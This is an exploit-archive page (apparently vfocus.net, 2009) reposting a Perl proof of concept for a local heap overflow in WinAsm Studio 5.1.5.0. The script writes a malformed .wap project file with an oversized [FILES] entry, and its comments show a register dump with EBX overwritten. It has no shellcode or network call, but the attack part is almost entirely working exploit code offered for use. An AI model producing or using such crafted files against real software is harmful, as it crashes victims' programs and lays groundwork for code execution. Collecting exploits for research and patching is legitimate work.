首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WinAsm Studio 5.1.5.0 Local Heap Overflow PoC
来源:www.vfcocus.net 作者:Stack 发布时间:2009-03-17  
# WinAsm Studio 5.1.5.0 Local Heap Overflow Poc
# By Mountassif Moad
# D0wnload : http://www.winasm.net/index.php?ind=downloads&op=download_file&ide=182&file=WinAsm515Full.zip
# Greatz : Simo-Soft - Skd - fl0 fl0w - Str0ke & By By milw0rm :d
#
# Registers
# EAX 00000001
# ECX 00000001
# EDX 0013F814
# EBX 42424242  ( EBX overwrited :d )
# ESP 0013FBDC
# EBP 0013FE3C
# ESI 0013FBF7
# EDI 0013FD2F ASCII "BBBBBBBBBB" (next chars in EDI :d )
# EIP 0040A927 WinAsm.0040A927
my $m=
"\x5B\x46\x49\x4C\x45\x53\x5D\x0D\x31\x3D".
"\x41" x 227 .
"\x42" x 4 .
"\x43" x 20 .
"\x0D\x5B\x50\x52".
"\x4F\x4A\x45\x43\x54\x5D\x0D\x54\x79\x70\x65\x3D\x0D\x52".
"\x65\x6C\x65\x61\x73\x65\x43\x6F\x6D\x6D\x61\x6E\x64\x4C\x69\x6E".
"\x65\x3D\x0D\x44\x65\x62\x75\x67\x43\x6F\x6D\x6D\x61\x6E\x64".
"\x4C\x69\x6E\x65\x3D\x0D\x41\x75\x74\x6F\x49\x6E\x63\x46\x69".
"\x6C\x65\x56\x65\x72\x73\x69\x6F\x6E\x3D\x30\x0D\x52\x43\x53".
"\x69\x6C\x65\x6E\x74\x3D\x30\x0D\x50\x65\x6C\x6C\x65\x73\x54".
"\x6F\x6F\x6C\x73\x3D\x30\x0D\x5B\x4D\x41\x4B\x45\x5D\x0D".
"\x41\x63\x74\x69\x76\x65\x42\x75\x69\x6C\x64\x3D\x30\x0D\x43".
"\x6F\x6D\x70\x69\x6C\x65\x52\x43\x3D\x0D\x52\x43\x54\x6F\x4F".
"\x62\x6A\x3D\x0D\x41\x73\x73\x65\x6D\x62\x6C\x65\x3D\x2F\x63".
"\x0D\x4C\x69\x6E\x6B\x3D\x0D\x4F\x75\x74\x3D\x0D\x44".
"\x65\x62\x41\x73\x73\x65\x6D\x62\x6C\x65\x3D\x2F\x63\x0D\x44".
"\x65\x62\x4C\x69\x6E\x6B\x3D\x0D\x44\x65\x62\x4F\x75\x74\x3D";
print $m;
print "\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print " +++    WinAsm Studio 5.1.5.0 Local Heap Overflow Poc       +++\n";
print " +++    Written By Stack                                    +++\n";
print " +++    Usage Ex.: perl $0 >>Exploit.wap                    +++\n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
exit;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox 3.0.7 Onbefore
·Gretech GOM Encoder 1.0.0.11 (
·Rosoft Media Player 4.2.1 Loca
·Google Chrome 1.0.154.48 Singl
·VLC 0.9.8a Web UI (input) Remo
·Sun Java System Messenger Expr
·Serv-U 7.4.0.1 (SMNT) Denial o
·The HP LaserJet web management
·Serv-U 7.4.0.1 (MKD) Create Ar
·Talkative IRC 0.4.4.16 Remote
·Morovia Barcode ActiveX 3.6.2
·GeoVision LiveAudio ActiveX Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved